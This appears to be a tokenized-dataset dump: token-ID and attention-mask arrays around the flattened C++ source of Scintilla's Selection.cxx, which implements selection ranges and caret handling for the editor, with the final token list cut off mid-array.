333, 29914, 19057, 29914, 6011, 13, 3492, 505, 8283, 2346, 297, 3884, 847, 26179, 333, 29914, 19057, 29914, 6011, 313, 277, 1736, 29897, 13, 3492, 505, 3512, 304, 847, 26179, 333, 29914, 2917, 304, 1735, 777, 5285, 13, 3492, 505, 8283, 2030, 1899, 773, 4955, 4682, 310, 596, 6473, 313, 277, 1838, 29915, 29873, 664, 29897, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
// Scintilla source code edit control /** @file Selection.cxx ** Classes maintaining the selection. **/ // Copyright 2009 by Neil Hodgson <neilh@scintilla.org> // The License.txt file describes the conditions under which this software may be distributed. #include <stdlib.h> #include <vector> #include "Platform.h" #include "Scintilla.h" #include "Selection.h" #ifdef SCI_NAMESPACE using namespace Scintilla; #endif void SelectionPosition::MoveForInsertDelete(bool insertion, int startChange, int length) { if (position == startChange) { virtualSpace = 0; } if (insertion) { if (position > startChange) { position += length; } } else { if (position > startChange) { int endDeletion = startChange + length; if (position > endDeletion) { position -= length; } else { position = startChange; virtualSpace = 0; } } } } bool SelectionPosition::operator <(const SelectionPosition &other) const { if (position == other.position) return virtualSpace < other.virtualSpace; else return position < other.position; } bool SelectionPosition::operator >(const SelectionPosition &other) const { if (position == other.position) return virtualSpace > other.virtualSpace; else return position > other.position; } bool SelectionPosition::operator <=(const SelectionPosition &other) const { if (position == other.position && virtualSpace == other.virtualSpace) return true; else return other > *this; } bool SelectionPosition::operator >=(const SelectionPosition &other) const { if (position == other.position && virtualSpace == other.virtualSpace) return true; else return *this > other; } int SelectionRange::Length() const { if (anchor > caret) { return anchor.Position() - caret.Position(); } else { return caret.Position() - anchor.Position(); } } bool SelectionRange::Contains(int pos) const { if (anchor > caret) return (pos >= caret.Position()) && (pos <= anchor.Position()); else return (pos >= anchor.Position()) && (pos <= caret.Position()); } bool SelectionRange::Contains(SelectionPosition sp) const { if (anchor > caret) return (sp >= caret) && (sp <= anchor); else return (sp >= anchor) && (sp <= caret); } bool SelectionRange::ContainsCharacter(int posCharacter) const { if (anchor > caret) return (posCharacter >= caret.Position()) && (posCharacter < anchor.Position()); else return (posCharacter >= anchor.Position()) && (posCharacter < caret.Position()); } SelectionSegment SelectionRange::Intersect(SelectionSegment check) const { SelectionSegment inOrder(caret, anchor); if ((inOrder.start <= check.end) || (inOrder.end >= check.start)) { SelectionSegment portion = check; if (portion.start < inOrder.start) portion.start = inOrder.start; if (portion.end > inOrder.end) portion.end = inOrder.end; if (portion.start > portion.end) return SelectionSegment(); else return portion; } else { return SelectionSegment(); } } bool SelectionRange::Trim(SelectionRange range) { SelectionPosition startRange = range.Start(); SelectionPosition endRange = range.End(); SelectionPosition start = Start(); SelectionPosition end = End(); PLATFORM_ASSERT(start <= end); PLATFORM_ASSERT(startRange <= endRange); if ((startRange <= end) && (endRange >= start)) { if ((start > startRange) && (end < endRange)) { // Completely covered by range -> empty at start end = start; } else if ((start < startRange) && (end > endRange)) { // Completely covers range -> empty at start end = start; } else if (start <= startRange) { // Trim end end = startRange; } else { // PLATFORM_ASSERT(end >= endRange); // Trim start start = endRange; } if (anchor > caret) { caret = start; anchor = end; } else { anchor = start; caret = end; } return Empty(); } else { return false; } } // If range is all virtual collapse to start of virtual space void SelectionRange::MinimizeVirtualSpace() { if (caret.Position() == anchor.Position()) { int virtualSpace = caret.VirtualSpace(); if (virtualSpace > anchor.VirtualSpace()) virtualSpace = anchor.VirtualSpace(); caret.SetVirtualSpace(virtualSpace); anchor.SetVirtualSpace(virtualSpace); } } Selection::Selection() : mainRange(0), moveExtends(false), tentativeMain(false), selType(selStream) { AddSelection(SelectionPosition(0)); } Selection::~Selection() { } bool Selection::IsRectangular() const { return (selType == selRectangle) || (selType == selThin); } int Selection::MainCaret() const { return ranges[mainRange].caret.Position(); } int Selection::MainAnchor() const { return ranges[mainRange].anchor.Position(); } SelectionRange &Selection::Rectangular() { return rangeRectangular; } SelectionSegment Selection::Limits() const { if (ranges.empty()) { return SelectionSegment(); } else { SelectionSegment sr(ranges[0].anchor, ranges[0].caret); for (size_t i=1; i<ranges.size(); i++) { sr.Extend(ranges[i].anchor); sr.Extend(ranges[i].caret); } return sr; } } SelectionSegment Selection::LimitsForRectangularElseMain() const { if (IsRectangular()) { return Limits(); } else { return SelectionSegment(ranges[mainRange].caret, ranges[mainRange].anchor); } } size_t Selection::Count() const { return ranges.size(); } size_t Selection::Main() const { return mainRange; } void Selection::SetMain(size_t r) { PLATFORM_ASSERT(r < ranges.size()); mainRange = r; } SelectionRange &Selection::Range(size_t r) { return ranges[r]; } SelectionRange &Selection::RangeMain() { return ranges[mainRange]; } bool Selection::MoveExtends() const { return moveExtends; } void Selection::SetMoveExtends(bool moveExtends_) { moveExtends = moveExtends_; } bool Selection::Empty() const { for (size_t i=0; i<ranges.size(); i++) { if (!ranges[i].Empty()) return false; } return true; } SelectionPosition Selection::Last() const { SelectionPosition lastPosition; for (size_t i=0; i<ranges.size(); i++) { if (lastPosition < ranges[i].caret) lastPosition = ranges[i].caret; if (lastPosition < ranges[i].anchor) lastPosition = ranges[i].anchor; } return lastPosition; } int Selection::Length() const { int len = 0; for (size_t i=0; i<ranges.size(); i++) { len += ranges[i].Length(); } return len; } void Selection::MovePositions(bool insertion, int startChange, int length) { for (size_t i=0; i<ranges.size(); i++) { ranges[i].caret.MoveForInsertDelete(insertion, startChange, length); ranges[i].anchor.MoveForInsertDelete(insertion, startChange, length); } } void Selection::TrimSelection(SelectionRange range) { for (size_t i=0; i<ranges.size();) { if ((i != mainRange) && (ranges[i].Trim(range))) { // Trimmed to empty so remove for (size_t j=i; j<ranges.size()-1; j++) { ranges[j] = ranges[j+1]; if (j == mainRange-1) mainRange--; } ranges.pop_back(); } else { i++; } } } void Selection::SetSelection(SelectionRange range) { ranges.clear(); ranges.push_back(range); mainRange = ranges.size() - 1; } void Selection::AddSelection(SelectionRange range) { TrimSelection(range); ranges.push_back(range); mainRange = ranges.size() - 1; } void Selection::AddSelectionWithoutTrim(SelectionRange range) { ranges.push_back(range); mainRange = ranges.size() - 1; } void Selection::TentativeSelection(SelectionRange range) { if (!tentativeMain) { rangesSaved = ranges; } ranges = rangesSaved; AddSelection(range); TrimSelection(ranges[mainRange]); tentativeMain = true; } void Selection::CommitTentative() { rangesSaved.clear(); tentativeMain = false; } int Selection::CharacterInSelection(int posCharacter) const { for (size_t i=0; i<ranges.size(); i++) { if (ranges[i].ContainsCharacter(posCharacter)) return i == mainRange ? 1 : 2; } return 0; } int Selection::InSelectionForEOL(int pos) const { for (size_t i=0; i<ranges.size(); i++) { if (!ranges[i].Empty() && (pos > ranges[i].Start().Position()) && (pos <= ranges[i].End().Position())) return i == mainRange ? 1 : 2; } return 0; } int Selection::VirtualSpaceFor(int pos) const { int virtualSpace = 0; for (size_t i=0; i<ranges.size(); i++) { if ((ranges[i].caret.Position() == pos) && (virtualSpace < ranges[i].caret.VirtualSpace())) virtualSpace = ranges[i].caret.VirtualSpace(); if ((ranges[i].anchor.Position() == pos) && (virtualSpace < ranges[i].anchor.VirtualSpace())) virtualSpace = ranges[i].anchor.VirtualSpace(); } return virtualSpace; } void Selection::Clear() { ranges.clear(); ranges.push_back(SelectionRange()); mainRange = ranges.size() - 1; selType = selStream; moveExtends = false; ranges[mainRange].Reset(); rangeRectangular.Reset(); } void Selection::RemoveDuplicates() { for (size_t i=0; i<ranges.size()-1; i++) { if (ranges[i].Empty()) { size_t j=i+1; while (j<ranges.size()) { if (ranges[i] == ranges[j]) { ranges.erase(ranges.begin() + j); if (mainRange >= j) mainRange--; } else { j++; } } } } } void Selection::RotateMain() { mainRange = (mainRange + 1) % ranges.size(); }
[ 1, 849, 2522, 524, 2911, 2752, 775, 3863, 2761, 13, 7918, 732, 1445, 27930, 29889, 29883, 4419, 13, 3579, 4134, 267, 7344, 292, 278, 9262, 29889, 13, 3579, 29914, 13, 458, 14187, 1266, 29871, 29906, 29900, 29900, 29929, 491, 29334, 379, 397, 29887, 1100, 529, 484, 309, 29882, 29992, 1557, 524, 2911, 29889, 990, 29958, 13, 458, 450, 19245, 29889, 3945, 934, 16612, 278, 5855, 1090, 607, 445, 7047, 1122, 367, 13235, 29889, 13, 13, 29937, 2856, 529, 4172, 1982, 29889, 29882, 29958, 13, 13, 29937, 2856, 529, 8111, 29958, 13, 13, 29937, 2856, 376, 21889, 29889, 29882, 29908, 13, 13, 29937, 2856, 376, 4421, 524, 2911, 29889, 29882, 29908, 13, 13, 29937, 2856, 376, 15097, 29889, 29882, 29908, 13, 13, 29937, 361, 1753, 317, 8426, 29918, 5813, 5550, 11538, 13, 4746, 7397, 2522, 524, 2911, 29936, 13, 29937, 15224, 13, 13, 5405, 27930, 8003, 1057, 16619, 2831, 17491, 12498, 29898, 11227, 4635, 291, 29892, 938, 1369, 7277, 29892, 938, 3309, 29897, 426, 13, 12, 361, 313, 3283, 1275, 1369, 7277, 29897, 426, 13, 12, 12, 18714, 14936, 353, 29871, 29900, 29936, 13, 12, 29913, 13, 12, 361, 313, 7851, 291, 29897, 426, 13, 12, 12, 361, 313, 3283, 1405, 1369, 7277, 29897, 426, 13, 12, 12, 12, 3283, 4619, 3309, 29936, 13, 12, 12, 29913, 13, 12, 29913, 1683, 426, 13, 12, 12, 361, 313, 3283, 1405, 1369, 7277, 29897, 426, 13, 12, 12, 12, 524, 1095, 2772, 1026, 291, 353, 1369, 7277, 718, 3309, 29936, 13, 12, 12, 12, 361, 313, 3283, 1405, 1095, 2772, 1026, 291, 29897, 426, 13, 12, 12, 12, 12, 3283, 22361, 3309, 29936, 13, 12, 12, 12, 29913, 1683, 426, 13, 12, 12, 12, 12, 3283, 353, 1369, 7277, 29936, 13, 12, 12, 12, 12, 18714, 14936, 353, 29871, 29900, 29936, 13, 12, 12, 12, 29913, 13, 12, 12, 29913, 13, 12, 29913, 13, 29913, 13, 13, 11227, 27930, 8003, 1057, 6891, 529, 29898, 3075, 27930, 8003, 669, 1228, 29897, 1040, 426, 13, 12, 361, 313, 3283, 1275, 916, 29889, 3283, 29897, 13, 12, 12, 2457, 6901, 14936, 529, 916, 29889, 18714, 14936, 29936, 13, 12, 2870, 13, 12, 12, 2457, 2602, 529, 916, 29889, 3283, 29936, 13, 29913, 13, 13, 11227, 27930, 8003, 1057, 6891, 1405, 29898, 3075, 27930, 8003, 669, 1228, 29897, 1040, 426, 13, 12, 361, 313, 3283, 1275, 916, 29889, 3283, 29897, 13, 12, 12, 2457, 6901, 14936, 1405, 916, 29889, 18714, 14936, 29936, 13, 12, 2870, 13, 12, 12, 2457, 2602, 1405, 916, 29889, 3283, 29936, 13, 29913, 13, 13, 11227, 27930, 8003, 1057, 6891, 5277, 29898, 3075, 27930, 8003, 669, 1228, 29897, 1040, 426, 13, 12, 361, 313, 3283, 1275, 916, 29889, 3283, 2607, 6901, 14936, 1275, 916, 29889, 18714, 14936, 29897, 13, 12, 12, 2457, 1565, 29936, 13, 12, 2870, 13, 12, 12, 2457, 916, 1405, 334, 1366, 29936, 13, 29913, 13, 13, 11227, 27930, 8003, 1057, 6891, 6736, 29898, 3075, 27930, 8003, 669, 1228, 29897, 1040, 426, 13, 12, 361, 313, 3283, 1275, 916, 29889, 3283, 2607, 6901, 14936, 1275, 916, 29889, 18714, 14936, 29897, 13, 12, 12, 2457, 1565, 29936, 13, 12, 2870, 13, 12, 12, 2457, 334, 1366, 1405, 916, 29936, 13, 29913, 13, 13, 524, 27930, 6069, 1057, 6513, 580, 1040, 426, 13, 12, 361, 313, 25367, 1405, 2562, 29873, 29897, 426, 13, 12, 12, 2457, 17360, 29889, 8003, 580, 448, 2562, 29873, 29889, 8003, 890, 13, 12, 29913, 1683, 426, 13, 12, 12, 2457, 2562, 29873, 29889, 8003, 580, 448, 17360, 29889, 8003, 890, 13, 12, 29913, 13, 29913, 13, 13, 11227, 27930, 6069, 1057, 21409, 29898, 524, 926, 29897, 1040, 426, 13, 12, 361, 313, 25367, 1405, 2562, 29873, 29897, 13, 12, 12, 2457, 313, 1066, 6736, 2562, 29873, 29889, 8003, 3101, 2607, 313, 1066, 5277, 17360, 29889, 8003, 3310, 13, 12, 2870, 13, 12, 12, 2457, 313, 1066, 6736, 17360, 29889, 8003, 3101, 2607, 313, 1066, 5277, 2562, 29873, 29889, 8003, 3310, 13, 29913, 13, 13, 11227, 27930, 6069, 1057, 21409, 29898, 15097, 8003, 805, 29897, 1040, 426, 13, 12, 361, 313, 25367, 1405, 2562, 29873, 29897, 13, 12, 12, 2457, 313, 1028, 6736, 2562, 29873, 29897, 2607, 313, 1028, 5277, 17360, 416, 13, 12, 2870, 13, 12, 12, 2457, 313, 1028, 6736, 17360, 29897, 2607, 313, 1028, 5277, 2562, 29873, 416, 13, 29913, 13, 13, 11227, 27930, 6069, 1057, 21409, 20755, 29898, 524, 926, 20755, 29897, 1040, 426, 13, 12, 361, 313, 25367, 1405, 2562, 29873, 29897, 13, 12, 12, 2457, 313, 1066, 20755, 6736, 2562, 29873, 29889, 8003, 3101, 2607, 313, 1066, 20755, 529, 17360, 29889, 8003, 3310, 13, 12, 2870, 13, 12, 12, 2457, 313, 1066, 20755, 6736, 17360, 29889, 8003, 3101, 2607, 313, 1066, 20755, 529, 2562, 29873, 29889, 8003, 3310, 13, 29913, 13, 13, 15097, 17669, 358, 27930, 6069, 1057, 4074, 8803, 29898, 15097, 17669, 358, 1423, 29897, 1040, 426, 13, 12, 15097, 17669, 358, 297, 7514, 29898, 29883, 10474, 29892, 17360, 416, 13, 12, 361, 5135, 262, 7514, 29889, 2962, 5277, 1423, 29889, 355, 29897, 3830, 313, 262, 7514, 29889, 355, 6736, 1423, 29889, 2962, 876, 426, 13, 12, 12, 15097, 17669, 358, 11910, 353, 1423, 29936, 13, 12, 12, 361, 313, 637, 291, 29889, 2962, 529, 297, 7514, 29889, 2962, 29897, 13, 12, 12, 12, 637, 291, 29889, 2962, 353, 297, 7514, 29889, 2962, 29936, 13, 12, 12, 361, 313, 637, 291, 29889, 355, 1405, 297, 7514, 29889, 355, 29897, 13, 12, 12, 12, 637, 291, 29889, 355, 353, 297, 7514, 29889, 355, 29936, 13, 12, 12, 361, 313, 637, 291, 29889, 2962, 1405, 11910, 29889, 355, 29897, 13, 12, 12, 12, 2457, 27930, 17669, 358, 890, 13, 12, 12, 2870, 13, 12, 12, 12, 2457, 11910, 29936, 13, 12, 29913, 1683, 426, 13, 12, 12, 2457, 27930, 17669, 358, 890, 13, 12, 29913, 13, 29913, 13, 13, 11227, 27930, 6069, 1057, 2308, 326, 29898, 15097, 6069, 3464, 29897, 426, 13, 12, 15097, 8003, 1369, 6069, 353, 3464, 29889, 4763, 890, 13, 12, 15097, 8003, 1095, 6069, 353, 3464, 29889, 5044, 890, 13, 12, 15097, 8003, 1369, 353, 7370, 890, 13, 12, 15097, 8003, 1095, 353, 2796, 890, 13, 12, 7390, 1299, 19094, 29918, 22933, 20161, 29898, 2962, 5277, 1095, 416, 13, 12, 7390, 1299, 19094, 29918, 22933, 20161, 29898, 2962, 6069, 5277, 1095, 6069, 416, 13, 12, 361, 5135, 2962, 6069, 5277, 1095, 29897, 2607, 313, 355, 6069, 6736, 1369, 876, 426, 13, 12, 12, 361, 5135, 2962, 1405, 1369, 6069, 29897, 2607, 313, 355, 529, 1095, 6069, 876, 426, 13, 12, 12, 12, 458, 15642, 29873, 873, 10664, 491, 3464, 1599, 4069, 472, 1369, 13, 12, 12, 12, 355, 353, 1369, 29936, 13, 12, 12, 29913, 1683, 565, 5135, 2962, 529, 1369, 6069, 29897, 2607, 313, 355, 1405, 1095, 6069, 876, 426, 13, 12, 12, 12, 458, 15642, 29873, 873, 18469, 3464, 1599, 4069, 472, 1369, 13, 12, 12, 12, 355, 353, 1369, 29936, 13, 12, 12, 29913, 1683, 565, 313, 2962, 5277, 1369, 6069, 29897, 426, 13, 12, 12, 12, 458, 1605, 326, 1095, 13, 12, 12, 12, 355, 353, 1369, 6069, 29936, 13, 12, 12, 29913, 1683, 426, 849, 13, 12, 12, 12, 7390, 1299, 19094, 29918, 22933, 20161, 29898, 355, 6736, 1095, 6069, 416, 13, 12, 12, 12, 458, 1605, 326, 1369, 13, 12, 12, 12, 2962, 353, 1095, 6069, 29936, 13, 12, 12, 29913, 13, 12, 12, 361, 313, 25367, 1405, 2562, 29873, 29897, 426, 13, 12, 12, 12, 29883, 10474, 353, 1369, 29936, 13, 12, 12, 12, 25367, 353, 1095, 29936, 13, 12, 12, 29913, 1683, 426, 13, 12, 12, 12, 25367, 353, 1369, 29936, 13, 12, 12, 12, 29883, 10474, 353, 1095, 29936, 13, 12, 12, 29913, 13, 12, 12, 2457, 2812, 2349, 890, 13, 12, 29913, 1683, 426, 13, 12, 12, 2457, 2089, 29936, 13, 12, 29913, 13, 29913, 13, 13, 458, 960, 3464, 338, 599, 6901, 24382, 304, 1369, 310, 6901, 2913, 13, 5405, 27930, 6069, 1057, 8140, 326, 675, 21287, 14936, 580, 426, 13, 12, 361, 313, 29883, 10474, 29889, 8003, 580, 1275, 17360, 29889, 8003, 3101, 426, 13, 12, 12, 524, 6901, 14936, 353, 2562, 29873, 29889, 21287, 14936, 890, 13, 12, 12, 361, 313, 18714, 14936, 1405, 17360, 29889, 21287, 14936, 3101, 13, 12, 12, 12, 18714, 14936, 353, 17360, 29889, 21287, 14936, 890, 13, 12, 12, 29883, 10474, 29889, 2697, 21287, 14936, 29898, 18714, 14936, 416, 13, 12, 12, 25367, 29889, 2697, 21287, 14936, 29898, 18714, 14936, 416, 13, 12, 29913, 13, 29913, 13, 13, 15097, 1057, 15097, 580, 584, 1667, 6069, 29898, 29900, 511, 4337, 5647, 1975, 29898, 4541, 511, 12033, 1230, 6330, 29898, 4541, 511, 5535, 1542, 29898, 2838, 3835, 29897, 426, 13, 12, 2528, 15097, 29898, 15097, 8003, 29898, 29900, 2483, 13, 29913, 13, 13, 15097, 1057, 30022, 15097, 580, 426, 13, 29913, 13, 13, 11227, 27930, 1057, 3624, 7364, 6825, 580, 1040, 426, 13, 12, 2457, 313, 2838, 1542, 1275, 5535, 7364, 2521, 29897, 3830, 313, 2838, 1542, 1275, 5535, 1349, 262, 416, 13, 29913, 13, 13, 524, 27930, 1057, 6330, 29907, 10474, 580, 1040, 426, 13, 12, 2457, 20238, 29961, 3396, 6069, 1822, 29883, 10474, 29889, 8003, 890, 13, 29913, 13, 13, 524, 27930, 1057, 6330, 24458, 580, 1040, 426, 13, 12, 2457, 20238, 29961, 3396, 6069, 1822, 25367, 29889, 8003, 890, 13, 29913, 13, 13, 15097, 6069, 669, 15097, 1057, 7364, 6825, 580, 426, 13, 12, 2457, 3464, 7364, 6825, 29936, 13, 29913, 13, 13, 15097, 17669, 358, 27930, 1057, 29931, 326, 1169, 580, 1040, 426, 13, 12, 361, 313, 29878, 6916, 29889, 6310, 3101, 426, 13, 12, 12, 2457, 27930, 17669, 358, 890, 13, 12, 29913, 1683, 426, 13, 12, 12, 15097, 17669, 358, 27236, 29898, 29878, 6916, 29961, 29900, 1822, 25367, 29892, 20238, 29961, 29900, 1822, 29883, 10474, 416, 13, 12, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29896, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 12, 21935, 29889, 5647, 355, 29898, 29878, 6916, 29961, 29875, 1822, 25367, 416, 13, 12, 12, 12, 21935, 29889, 5647, 355, 29898, 29878, 6916, 29961, 29875, 1822, 29883, 10474, 416, 13, 12, 12, 29913, 13, 12, 12, 2457, 27236, 29936, 13, 12, 29913, 13, 29913, 13, 13, 15097, 17669, 358, 27930, 1057, 29931, 326, 1169, 2831, 7364, 6825, 27406, 6330, 580, 1040, 426, 13, 12, 361, 313, 3624, 7364, 6825, 3101, 426, 13, 12, 12, 2457, 9628, 1169, 890, 13, 12, 29913, 1683, 426, 13, 12, 12, 2457, 27930, 17669, 358, 29898, 29878, 6916, 29961, 3396, 6069, 1822, 29883, 10474, 29892, 20238, 29961, 3396, 6069, 1822, 25367, 416, 13, 12, 29913, 13, 29913, 13, 13, 2311, 29918, 29873, 27930, 1057, 3981, 580, 1040, 426, 13, 12, 2457, 20238, 29889, 2311, 890, 13, 29913, 13, 13, 2311, 29918, 29873, 27930, 1057, 6330, 580, 1040, 426, 13, 12, 2457, 1667, 6069, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 2697, 6330, 29898, 2311, 29918, 29873, 364, 29897, 426, 13, 12, 7390, 1299, 19094, 29918, 22933, 20161, 29898, 29878, 529, 20238, 29889, 2311, 3310, 13, 12, 3396, 6069, 353, 364, 29936, 13, 29913, 13, 13, 15097, 6069, 669, 15097, 1057, 6069, 29898, 2311, 29918, 29873, 364, 29897, 426, 13, 12, 2457, 20238, 29961, 29878, 1385, 13, 29913, 13, 13, 15097, 6069, 669, 15097, 1057, 6069, 6330, 580, 426, 13, 12, 2457, 20238, 29961, 3396, 6069, 1385, 13, 29913, 13, 13, 11227, 27930, 1057, 16619, 5647, 1975, 580, 1040, 426, 13, 12, 2457, 4337, 5647, 1975, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 2697, 16619, 5647, 1975, 29898, 11227, 4337, 5647, 1975, 19925, 426, 13, 12, 11631, 5647, 1975, 353, 4337, 5647, 1975, 16141, 13, 29913, 13, 13, 11227, 27930, 1057, 8915, 580, 1040, 426, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 361, 5384, 29878, 6916, 29961, 29875, 1822, 8915, 3101, 13, 12, 12, 12, 2457, 2089, 29936, 13, 12, 29913, 13, 12, 2457, 1565, 29936, 13, 29913, 13, 13, 15097, 8003, 27930, 1057, 8897, 580, 1040, 426, 13, 12, 15097, 8003, 1833, 8003, 29936, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 361, 313, 4230, 8003, 529, 20238, 29961, 29875, 1822, 29883, 10474, 29897, 13, 12, 12, 12, 4230, 8003, 353, 20238, 29961, 29875, 1822, 29883, 10474, 29936, 13, 12, 12, 361, 313, 4230, 8003, 529, 20238, 29961, 29875, 1822, 25367, 29897, 13, 12, 12, 12, 4230, 8003, 353, 20238, 29961, 29875, 1822, 25367, 29936, 13, 12, 29913, 13, 12, 2457, 1833, 8003, 29936, 13, 29913, 13, 13, 524, 27930, 1057, 6513, 580, 1040, 426, 13, 12, 524, 7431, 353, 29871, 29900, 29936, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 2435, 4619, 20238, 29961, 29875, 1822, 6513, 890, 13, 12, 29913, 13, 12, 2457, 7431, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 16619, 9135, 2187, 29898, 11227, 4635, 291, 29892, 938, 1369, 7277, 29892, 938, 3309, 29897, 426, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 29878, 6916, 29961, 29875, 1822, 29883, 10474, 29889, 16619, 2831, 17491, 12498, 29898, 7851, 291, 29892, 1369, 7277, 29892, 3309, 416, 13, 12, 12, 29878, 6916, 29961, 29875, 1822, 25367, 29889, 16619, 2831, 17491, 12498, 29898, 7851, 291, 29892, 1369, 7277, 29892, 3309, 416, 13, 12, 29913, 13, 29913, 13, 13, 5405, 27930, 1057, 2308, 326, 15097, 29898, 15097, 6069, 3464, 29897, 426, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 29897, 426, 13, 12, 12, 361, 5135, 29875, 2804, 1667, 6069, 29897, 2607, 313, 29878, 6916, 29961, 29875, 1822, 2308, 326, 29898, 3881, 4961, 426, 13, 12, 12, 12, 458, 1605, 326, 2168, 304, 4069, 577, 3349, 13, 12, 12, 12, 1454, 313, 2311, 29918, 29873, 432, 29922, 29875, 29936, 432, 29966, 29878, 6916, 29889, 2311, 580, 29899, 29896, 29936, 432, 4862, 426, 13, 12, 12, 12, 12, 29878, 6916, 29961, 29926, 29962, 353, 20238, 29961, 29926, 29974, 29896, 1385, 13, 12, 12, 12, 12, 361, 313, 29926, 1275, 1667, 6069, 29899, 29896, 29897, 13, 12, 12, 12, 12, 12, 3396, 6069, 489, 29936, 13, 12, 12, 12, 29913, 13, 12, 12, 12, 29878, 6916, 29889, 7323, 29918, 1627, 890, 13, 12, 12, 29913, 1683, 426, 13, 12, 12, 12, 29875, 9107, 13, 12, 12, 29913, 13, 12, 29913, 13, 29913, 13, 13, 5405, 27930, 1057, 2697, 15097, 29898, 15097, 6069, 3464, 29897, 426, 13, 12, 29878, 6916, 29889, 8551, 890, 13, 12, 29878, 6916, 29889, 5910, 29918, 1627, 29898, 3881, 416, 13, 12, 3396, 6069, 353, 20238, 29889, 2311, 580, 448, 29871, 29896, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 2528, 15097, 29898, 15097, 6069, 3464, 29897, 426, 13, 12, 2308, 326, 15097, 29898, 3881, 416, 13, 12, 29878, 6916, 29889, 5910, 29918, 1627, 29898, 3881, 416, 13, 12, 3396, 6069, 353, 20238, 29889, 2311, 580, 448, 29871, 29896, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 2528, 15097, 3047, 449, 2308, 326, 29898, 15097, 6069, 3464, 29897, 426, 13, 12, 29878, 6916, 29889, 5910, 29918, 1627, 29898, 3881, 416, 13, 12, 3396, 6069, 353, 20238, 29889, 2311, 580, 448, 29871, 29896, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 29911, 296, 1230, 15097, 29898, 15097, 6069, 3464, 29897, 426, 13, 12, 361, 5384, 29873, 296, 1230, 6330, 29897, 426, 13, 12, 12, 29878, 6916, 29903, 10511, 353, 20238, 29936, 13, 12, 29913, 13, 12, 29878, 6916, 353, 20238, 29903, 10511, 29936, 13, 12, 2528, 15097, 29898, 3881, 416, 13, 12, 2308, 326, 15097, 29898, 29878, 6916, 29961, 3396, 6069, 5691, 13, 12, 29873, 296, 1230, 6330, 353, 1565, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 1523, 2415, 29911, 296, 1230, 580, 426, 13, 12, 29878, 6916, 29903, 10511, 29889, 8551, 890, 13, 12, 29873, 296, 1230, 6330, 353, 2089, 29936, 13, 29913, 13, 13, 524, 27930, 1057, 20755, 797, 15097, 29898, 524, 926, 20755, 29897, 1040, 426, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 361, 313, 29878, 6916, 29961, 29875, 1822, 21409, 20755, 29898, 1066, 20755, 876, 13, 12, 12, 12, 2457, 474, 1275, 1667, 6069, 1577, 29871, 29896, 584, 29871, 29906, 29936, 13, 12, 29913, 13, 12, 2457, 29871, 29900, 29936, 13, 29913, 13, 13, 524, 27930, 1057, 797, 15097, 2831, 29923, 5607, 29898, 524, 926, 29897, 1040, 426, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 361, 5384, 29878, 6916, 29961, 29875, 1822, 8915, 580, 2607, 313, 1066, 1405, 20238, 29961, 29875, 1822, 4763, 2141, 8003, 3101, 2607, 313, 1066, 5277, 20238, 29961, 29875, 1822, 5044, 2141, 8003, 22130, 13, 12, 12, 12, 2457, 474, 1275, 1667, 6069, 1577, 29871, 29896, 584, 29871, 29906, 29936, 13, 12, 29913, 13, 12, 2457, 29871, 29900, 29936, 13, 29913, 13, 13, 524, 27930, 1057, 21287, 14936, 2831, 29898, 524, 926, 29897, 1040, 426, 13, 12, 524, 6901, 14936, 353, 29871, 29900, 29936, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 890, 474, 4862, 426, 13, 12, 12, 361, 5135, 29878, 6916, 29961, 29875, 1822, 29883, 10474, 29889, 8003, 580, 1275, 926, 29897, 2607, 313, 18714, 14936, 529, 20238, 29961, 29875, 1822, 